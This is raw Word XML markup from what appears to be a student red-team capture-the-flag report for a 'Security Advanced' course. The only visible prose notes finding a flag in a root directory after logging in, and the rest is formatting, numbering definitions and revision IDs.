    <w:p w14:paraId="122CA66E" w14:textId="307B3ABC" w:rsidR="5847C127" w:rsidRDefault="5847C127" w:rsidP="5847C127">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17F29C1F" w14:textId="5E0D46A2" w:rsidR="69477544" w:rsidRDefault="484EC695" w:rsidP="69477544">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="28AAAE99" wp14:editId="51242BC9">
            <wp:extent cx="5724525" cy="1447800"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="358779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9267" name="Picture 35877926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A21F" w14:textId="787040EF" w:rsidR="69C75259" w:rsidRPr="008D583E" w:rsidRDefault="6C313A4A" w:rsidP="24730F8F">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>After we are logged in</w:t>
      </w:r>
      <w:r w:rsidR="1ACA2B4F" w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="24730F8F">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> we can look around and we eventually find the flag in the root directory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1596F1AF" w14:textId="27A892F6" w:rsidR="36935ED3" w:rsidRDefault="36935ED3" w:rsidP="36935ED3">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A57B606" w14:textId="66D6512E" w:rsidR="00415399" w:rsidRDefault="69C75259" w:rsidP="5C37A370">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26D88C25" wp14:editId="54A4D208">
            <wp:extent cx="5724525" cy="1762125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1438365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65139" name="Picture 14383651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399">
      <w:headerReference w:type="default" r:id="rId39"/>
      <w:foot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7C23" w14:textId="77777777" w:rsidR="004365A4" w:rsidRPr="00F71CAB" w:rsidRDefault="004365A4">
      <w:r w:rsidRPr="00F71CAB">
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0B7D5BEF" w14:textId="77777777" w:rsidR="004365A4" w:rsidRPr="00F71CAB" w:rsidRDefault="004365A4">
      <w:r w:rsidRPr="00F71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3A4D" w14:textId="77777777" w:rsidR="00BD069A" w:rsidRPr="00F71CAB" w:rsidRDefault="00C32FA6">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
      </w:pBdr>
      <w:spacing w:before="200"/>
    </w:pPr>
    <w:r w:rsidRPr="00F71CAB">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">BD Groep 2   |   Gert-Jan Bollen, Levi Smeets, Remy Brouwers, Robbe Koreman    |    p. </w:t>
    </w:r>
    <w:r w:rsidRPr="00F71CAB">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00F71CAB">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r w:rsidRPr="00F71CAB">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidRPr="00F71CAB">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>1</w:t>
    </w:r>
    <w:r w:rsidRPr="00F71CAB">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r w:rsidRPr="00F71CAB">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve"> / </w:t>
    </w:r>
    <w:r w:rsidRPr="00F71CAB">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r w:rsidRPr="00F71CAB">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r w:rsidRPr="00F71CAB">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidRPr="00F71CAB">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r w:rsidRPr="00F71CAB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31DE" w14:textId="77777777" w:rsidR="004365A4" w:rsidRPr="00F71CAB" w:rsidRDefault="004365A4">
      <w:r w:rsidRPr="00F71CAB">
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="0ACCFFB0" w14:textId="77777777" w:rsidR="004365A4" w:rsidRPr="00F71CAB" w:rsidRDefault="004365A4">
      <w:r w:rsidRPr="00F71C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F8E5" w14:textId="60F7E96D" w:rsidR="00BD069A" w:rsidRPr="00222E5C" w:rsidRDefault="007B3A33">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="4" w:space="1" w:color="2E75B6"/>
      </w:pBdr>
      <w:spacing w:after="200"/>
      <w:rPr>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:pPr>
    <w:proofErr w:type="spellStart"/>
    <w:r w:rsidRPr="00222E5C">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>Groepsopdracht</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r w:rsidRPr="00222E5C">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve"> Red</w:t>
    </w:r>
    <w:r w:rsidR="00581BCA" w:rsidRPr="00222E5C">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">  </w:t>
    </w:r>
    <w:r w:rsidR="00C32FA6" w:rsidRPr="00222E5C">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">  </w:t>
    </w:r>
    <w:r w:rsidR="00581BCA" w:rsidRPr="00222E5C">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">|  </w:t>
    </w:r>
    <w:r w:rsidR="00C32FA6" w:rsidRPr="00222E5C">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">  </w:t>
    </w:r>
    <w:r w:rsidR="00581BCA" w:rsidRPr="00222E5C">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t>Security Advanced</w:t>
    </w:r>
    <w:r w:rsidR="00C32FA6" w:rsidRPr="00222E5C">
      <w:rPr>
        <w:color w:val="666666"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
      <w:t xml:space="preserve">   |   BD Groep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D2A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="30885B8C"/>
    <w:lvl w:ilvl="0" w:tplc="ABE04F94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B88AD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0" w:tplc="328C6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6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AA4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07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E7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3E6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21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0A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64A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82C8D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B2D2B4A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753B3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="46826BA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0F">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal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97A18"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F7E6C0C6"/>
    <w:lvl w:ilvl="0" w:tplc="EADC7AB6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="2A9C0A3E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="3FBA4B96">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="229E587C">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="EBD4DF34">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="59405B18">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="2E5AADA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="5FE64EE8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A5F0754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6F7DAB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AEDE122C"/>
    <w:lvl w:ilvl="0" w:tplc="7974FC84">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="10F867EE">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="AD1A4E26">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="97B69C70">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="004A8FCC">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="037C0A6E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="76FC0554">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A55C682A">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="6CA8D056">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="741C2C38"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="517ED8A2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657613386">
    <w:abstractNumId w:val="4"/>
    <w:lvlOverride w:ilvl="0">
      <w:startOverride w:val="1"/>
    </w:lvlOverride>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="403915412">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2078284890">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="112334858">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="99692248">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1096171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9A"/>
    <w:rsid w:val="000013AC"/>
    <w:rsid w:val="000017D0"/>
    <w:rsid w:val="00002602"/>
    <w:rsid w:val="00004C47"/>
    <w:rsid w:val="00006ACF"/>
    <w:rsid w:val="000078A2"/>
    <w:rsid w:val="00010DEB"/>
    <w:rsid w:val="00011CE8"/>
    <w:rsid w:val="00015466"/>
    <w:rsid w:val="00015F4D"/>
    <w:rsid w:val="00016A68"/>
    <w:rsid w:val="0001709F"/>
    <w:rsid w:val="00017643"/>
    <w:rsid w:val="0002060D"/>
    <w:rsid w:val="00021B89"/>
    <w:rsid w:val="00024C62"/>
    <w:rsid w:val="00025D14"/>
    <w:rsid w:val="00025F84"/>
    <w:rsid w:val="00026A23"/>
    <w:rsid w:val="00030D3A"/>
    <w:rsid w:val="00032EF9"/>
    <w:rsid w:val="00033530"/>
    <w:rsid w:val="0003388F"/>
    <w:rsid w:val="00035747"/>
    <w:rsid w:val="00040A62"/>
    <w:rsid w:val="00042671"/>
    <w:rsid w:val="00043CB9"/>
    <w:rsid w:val="00045AAE"/>
    <w:rsid w:val="0004689A"/>
    <w:rsid w:val="00047ABE"/>
    <w:rsid w:val="0005084C"/>
    <w:rsid w:val="000520B2"/>
    <w:rsid w:val="00052BBA"/>
    <w:rsid w:val="00052D23"/>
    <w:rsid w:val="0005319E"/>
    <w:rsid w:val="00053538"/>
    <w:rsid w:val="000541E8"/>
    <w:rsid w:val="00054659"/>
    <w:rsid w:val="000549F8"/>
    <w:rsid w:val="0005501D"/>
    <w:rsid w:val="000551C6"/>
    <w:rsid w:val="00057C4D"/>
    <w:rsid w:val="00060152"/>
    <w:rsid w:val="00060529"/>
    <w:rsid w:val="00060A9E"/>
    <w:rsid w:val="0006270E"/>
    <w:rsid w:val="00062F4A"/>
    <w:rsid w:val="0007092F"/>
    <w:rsid w:val="00070B2B"/>
    <w:rsid w:val="00070B50"/>
    <w:rsid w:val="00071E90"/>
    <w:rsid w:val="00072BCD"/>
    <w:rsid w:val="00072FAB"/>
    <w:rsid w:val="000734E2"/>
    <w:rsid w:val="00075199"/>
    <w:rsid w:val="0007E38C"/>
    <w:rsid w:val="000808B9"/>
    <w:rsid w:val="0008261D"/>
    <w:rsid w:val="00082BE3"/>
    <w:rsid w:val="00083852"/>
    <w:rsid w:val="00084DE4"/>
    <w:rsid w:val="0008550E"/>
    <w:rsid w:val="00087CBD"/>
    <w:rsid w:val="00090FBE"/>
    <w:rsid w:val="000918D6"/>
    <w:rsid w:val="000933D3"/>
    <w:rsid w:val="00094BD3"/>
    <w:rsid w:val="000A00DE"/>
    <w:rsid w:val="000A15D9"/>
    <w:rsid w:val="000A1896"/>
    <w:rsid w:val="000A235A"/>
    <w:rsid w:val="000A238A"/>
    <w:rsid w:val="000A4C97"/>
    <w:rsid w:val="000A539F"/>
    <w:rsid w:val="000A60AD"/>
    <w:rsid w:val="000A661E"/>
    <w:rsid w:val="000B1AEB"/>
    <w:rsid w:val="000B2C81"/>
    <w:rsid w:val="000B3249"/>
    <w:rsid w:val="000B3F16"/>
    <w:rsid w:val="000B421E"/>
    <w:rsid w:val="000B4E81"/>
    <w:rsid w:val="000B50C1"/>
    <w:rsid w:val="000B5170"/>
    <w:rsid w:val="000C3DE3"/>
    <w:rsid w:val="000C55A2"/>
    <w:rsid w:val="000C66AB"/>
    <w:rsid w:val="000C6C16"/>
    <w:rsid w:val="000C79B3"/>
    <w:rsid w:val="000C7ECB"/>
    <w:rsid w:val="000D0A06"/>
    <w:rsid w:val="000D1EB1"/>
    <w:rsid w:val="000D41E4"/>
    <w:rsid w:val="000D54A7"/>
    <w:rsid w:val="000D5E0B"/>
    <w:rsid w:val="000D70E3"/>
    <w:rsid w:val="000D7658"/>
    <w:rsid w:val="000D7C73"/>
    <w:rsid w:val="000E0DEB"/>
    <w:rsid w:val="000E1F96"/>
    <w:rsid w:val="000E3187"/>
    <w:rsid w:val="000E33EF"/>
    <w:rsid w:val="000E4DC0"/>
    <w:rsid w:val="000E5527"/>
    <w:rsid w:val="000E65B9"/>
    <w:rsid w:val="000E7088"/>
    <w:rsid w:val="000E71F9"/>
    <w:rsid w:val="000E73E2"/>
    <w:rsid w:val="000E782B"/>
    <w:rsid w:val="000E7A72"/>
    <w:rsid w:val="000F1CC6"/>
    <w:rsid w:val="000F23BE"/>
    <w:rsid w:val="000F366D"/>
    <w:rsid w:val="000F401C"/>
    <w:rsid w:val="000F4E4E"/>
    <w:rsid w:val="000F66F3"/>
    <w:rsid w:val="0010047D"/>
    <w:rsid w:val="0010329D"/>
    <w:rsid w:val="001040A3"/>
    <w:rsid w:val="001045A6"/>
    <w:rsid w:val="00106417"/>
    <w:rsid w:val="00106C13"/>
    <w:rsid w:val="00107377"/>
    <w:rsid w:val="00107DCC"/>
    <w:rsid w:val="00110A75"/>
    <w:rsid w:val="00111EC3"/>
    <w:rsid w:val="00113503"/>
    <w:rsid w:val="001147DA"/>
    <w:rsid w:val="00115A93"/>
    <w:rsid w:val="00120C78"/>
    <w:rsid w:val="00121F5C"/>
    <w:rsid w:val="00121FA4"/>
    <w:rsid w:val="00124942"/>
    <w:rsid w:val="00124E84"/>
    <w:rsid w:val="00125C0F"/>
    <w:rsid w:val="00126CBE"/>
    <w:rsid w:val="00127375"/>
    <w:rsid w:val="00130F46"/>
    <w:rsid w:val="00132620"/>
    <w:rsid w:val="00132EB9"/>
    <w:rsid w:val="001357C1"/>
    <w:rsid w:val="00136BE5"/>
    <w:rsid w:val="00136EBF"/>
    <w:rsid w:val="001400A4"/>
    <w:rsid w:val="001412D8"/>
    <w:rsid w:val="00141AD7"/>
    <w:rsid w:val="001420C4"/>
    <w:rsid w:val="001437B4"/>
    <w:rsid w:val="0014389C"/>
    <w:rsid w:val="00143B2E"/>
    <w:rsid w:val="00143CE2"/>
    <w:rsid w:val="00150A71"/>
    <w:rsid w:val="00151B73"/>
    <w:rsid w:val="00151C85"/>
    <w:rsid w:val="00151E01"/>
    <w:rsid w:val="001538D0"/>
    <w:rsid w:val="00154D1F"/>
    <w:rsid w:val="001557A1"/>
    <w:rsid w:val="00155998"/>
    <w:rsid w:val="0015604D"/>
    <w:rsid w:val="00156CBC"/>
    <w:rsid w:val="00157FEF"/>
    <w:rsid w:val="00160C41"/>
    <w:rsid w:val="00162B2D"/>
    <w:rsid w:val="001637E4"/>
    <w:rsid w:val="00164069"/>
    <w:rsid w:val="00165ECD"/>
    <w:rsid w:val="001667CD"/>
    <w:rsid w:val="00167706"/>
    <w:rsid w:val="00171896"/>
    <w:rsid w:val="001723DE"/>
    <w:rsid w:val="001727BD"/>
    <w:rsid w:val="00173585"/>
    <w:rsid w:val="00173E17"/>
    <w:rsid w:val="00173F17"/>
    <w:rsid w:val="00175BF8"/>
    <w:rsid w:val="00176532"/>
    <w:rsid w:val="0018420B"/>
    <w:rsid w:val="00185AE2"/>
    <w:rsid w:val="0018665C"/>
    <w:rsid w:val="00190610"/>
    <w:rsid w:val="00192997"/>
    <w:rsid w:val="00193A26"/>
    <w:rsid w:val="00193C44"/>
    <w:rsid w:val="00196EDE"/>
    <w:rsid w:val="001A0A77"/>
    <w:rsid w:val="001A0EEE"/>
    <w:rsid w:val="001A2625"/>
    <w:rsid w:val="001A30E2"/>
    <w:rsid w:val="001A318D"/>
    <w:rsid w:val="001A32E9"/>
    <w:rsid w:val="001A5A53"/>
    <w:rsid w:val="001A679D"/>
    <w:rsid w:val="001A6AE1"/>
    <w:rsid w:val="001B00CE"/>
    <w:rsid w:val="001B019F"/>
    <w:rsid w:val="001B0277"/>
    <w:rsid w:val="001B19D8"/>
    <w:rsid w:val="001B2165"/>
    <w:rsid w:val="001B2C9B"/>
    <w:rsid w:val="001B301C"/>
    <w:rsid w:val="001B4B61"/>
    <w:rsid w:val="001B65DA"/>
    <w:rsid w:val="001B6DE0"/>
    <w:rsid w:val="001B74A9"/>
    <w:rsid w:val="001C4BCD"/>
    <w:rsid w:val="001C5DCF"/>
    <w:rsid w:val="001C72C0"/>
    <w:rsid w:val="001C7739"/>
    <w:rsid w:val="001D1055"/>
    <w:rsid w:val="001D11D7"/>
    <w:rsid w:val="001D1A77"/>
    <w:rsid w:val="001D1F7F"/>
    <w:rsid w:val="001D5216"/>
    <w:rsid w:val="001D78FC"/>
    <w:rsid w:val="001E0DE7"/>
    <w:rsid w:val="001E3B78"/>
    <w:rsid w:val="001E3F31"/>
    <w:rsid w:val="001E4AC1"/>
    <w:rsid w:val="001E758B"/>
    <w:rsid w:val="001F03A6"/>
    <w:rsid w:val="001F0E93"/>
    <w:rsid w:val="001F1DDB"/>
    <w:rsid w:val="001F4855"/>
    <w:rsid w:val="001F5870"/>
    <w:rsid w:val="001F5A72"/>
    <w:rsid w:val="001F70D7"/>
    <w:rsid w:val="001F760C"/>
    <w:rsid w:val="00201F6C"/>
    <w:rsid w:val="0020200F"/>
    <w:rsid w:val="00202916"/>
    <w:rsid w:val="002035D4"/>
    <w:rsid w:val="0020368F"/>
    <w:rsid w:val="00205210"/>
    <w:rsid w:val="00206464"/>
    <w:rsid w:val="00206561"/>
    <w:rsid w:val="002066E0"/>
    <w:rsid w:val="00206BA3"/>
    <w:rsid w:val="00207833"/>
    <w:rsid w:val="002078B7"/>
    <w:rsid w:val="002105B0"/>
    <w:rsid w:val="002119A1"/>
    <w:rsid w:val="00214C92"/>
    <w:rsid w:val="0021662F"/>
    <w:rsid w:val="00216867"/>
    <w:rsid w:val="002201C1"/>
    <w:rsid w:val="00220661"/>
    <w:rsid w:val="002212F8"/>
    <w:rsid w:val="00221F4C"/>
    <w:rsid w:val="00222E5C"/>
    <w:rsid w:val="002238C4"/>
    <w:rsid w:val="002257B2"/>
    <w:rsid w:val="00227015"/>
    <w:rsid w:val="0023194F"/>
    <w:rsid w:val="00232BC2"/>
    <w:rsid w:val="00232EED"/>
    <w:rsid w:val="00232F87"/>
    <w:rsid w:val="00233C66"/>
    <w:rsid w:val="0023417C"/>
    <w:rsid w:val="002345DD"/>
    <w:rsid w:val="00234B1E"/>
    <w:rsid w:val="00235BF0"/>
    <w:rsid w:val="00235D4F"/>
    <w:rsid w:val="0023670C"/>
    <w:rsid w:val="00236CF1"/>
    <w:rsid w:val="00236DEE"/>
    <w:rsid w:val="002371CF"/>
    <w:rsid w:val="0023751E"/>
    <w:rsid w:val="002376C0"/>
    <w:rsid w:val="002378EA"/>
    <w:rsid w:val="00240052"/>
    <w:rsid w:val="00241647"/>
    <w:rsid w:val="0024318D"/>
    <w:rsid w:val="002474A8"/>
    <w:rsid w:val="002477ED"/>
    <w:rsid w:val="00250538"/>
    <w:rsid w:val="00250D68"/>
    <w:rsid w:val="0025113F"/>
    <w:rsid w:val="00251ED0"/>
    <w:rsid w:val="00252FAE"/>
    <w:rsid w:val="00253623"/>
    <w:rsid w:val="00254934"/>
    <w:rsid w:val="00261056"/>
    <w:rsid w:val="00261766"/>
    <w:rsid w:val="0026244F"/>
    <w:rsid w:val="00263A5E"/>
    <w:rsid w:val="00263CDF"/>
    <w:rsid w:val="002645D9"/>
    <w:rsid w:val="00264831"/>
    <w:rsid w:val="0026527D"/>
    <w:rsid w:val="002653B9"/>
    <w:rsid w:val="00265477"/>
    <w:rsid w:val="00265E35"/>
    <w:rsid w:val="00267772"/>
    <w:rsid w:val="002677E2"/>
    <w:rsid w:val="00273330"/>
    <w:rsid w:val="00275732"/>
    <w:rsid w:val="00275B8C"/>
    <w:rsid w:val="0027778B"/>
    <w:rsid w:val="002837DD"/>
    <w:rsid w:val="00284F08"/>
    <w:rsid w:val="00285D45"/>
    <w:rsid w:val="00286BDB"/>
    <w:rsid w:val="00290682"/>
    <w:rsid w:val="0029362E"/>
    <w:rsid w:val="002943D5"/>
    <w:rsid w:val="002A0321"/>
    <w:rsid w:val="002A0696"/>
    <w:rsid w:val="002A1CB4"/>
    <w:rsid w:val="002A1FC9"/>
    <w:rsid w:val="002A29EA"/>
    <w:rsid w:val="002A360A"/>
    <w:rsid w:val="002A36D7"/>
    <w:rsid w:val="002A3772"/>
    <w:rsid w:val="002A444F"/>
    <w:rsid w:val="002A4779"/>
    <w:rsid w:val="002A52C3"/>
    <w:rsid w:val="002A52D7"/>
    <w:rsid w:val="002A533D"/>
    <w:rsid w:val="002A654D"/>
    <w:rsid w:val="002A7505"/>
    <w:rsid w:val="002B0CDF"/>
    <w:rsid w:val="002B1E80"/>
    <w:rsid w:val="002B4543"/>
    <w:rsid w:val="002B5F9F"/>
    <w:rsid w:val="002C0297"/>
    <w:rsid w:val="002C0819"/>
    <w:rsid w:val="002C09AE"/>
    <w:rsid w:val="002C0B5C"/>
    <w:rsid w:val="002C178B"/>
    <w:rsid w:val="002C29E1"/>
    <w:rsid w:val="002C3236"/>
    <w:rsid w:val="002C32B5"/>
    <w:rsid w:val="002C5D51"/>
    <w:rsid w:val="002D0DCE"/>
    <w:rsid w:val="002D1C09"/>
    <w:rsid w:val="002D24BD"/>
    <w:rsid w:val="002D293B"/>
    <w:rsid w:val="002D40E3"/>
    <w:rsid w:val="002D4FFE"/>
    <w:rsid w:val="002D6F90"/>
    <w:rsid w:val="002E0EF7"/>
    <w:rsid w:val="002E172A"/>
    <w:rsid w:val="002E1784"/>
    <w:rsid w:val="002E2510"/>
    <w:rsid w:val="002E28B3"/>
    <w:rsid w:val="002E4E94"/>
    <w:rsid w:val="002E53AA"/>
    <w:rsid w:val="002E6526"/>
    <w:rsid w:val="002E74A5"/>
    <w:rsid w:val="002F0A3E"/>
    <w:rsid w:val="002F1BD6"/>
    <w:rsid w:val="002F25C6"/>
    <w:rsid w:val="002F2CF3"/>
    <w:rsid w:val="002F304F"/>
    <w:rsid w:val="002F31B7"/>
    <w:rsid w:val="002F3E6E"/>
    <w:rsid w:val="002F5D48"/>
    <w:rsid w:val="002F637B"/>
    <w:rsid w:val="002F6390"/>
    <w:rsid w:val="002F6833"/>
    <w:rsid w:val="002F708F"/>
    <w:rsid w:val="002F7F89"/>
    <w:rsid w:val="00301510"/>
    <w:rsid w:val="00301825"/>
    <w:rsid w:val="00301ECE"/>
    <w:rsid w:val="00302E6F"/>
    <w:rsid w:val="0030416A"/>
    <w:rsid w:val="00305B2E"/>
    <w:rsid w:val="0030623F"/>
    <w:rsid w:val="00306849"/>
    <w:rsid w:val="00306858"/>
    <w:rsid w:val="00306EA7"/>
    <w:rsid w:val="0030799A"/>
    <w:rsid w:val="00310206"/>
    <w:rsid w:val="0031073C"/>
    <w:rsid w:val="00310A8E"/>
    <w:rsid w:val="00311E7E"/>
    <w:rsid w:val="003149BA"/>
    <w:rsid w:val="003150B6"/>
    <w:rsid w:val="00315549"/>
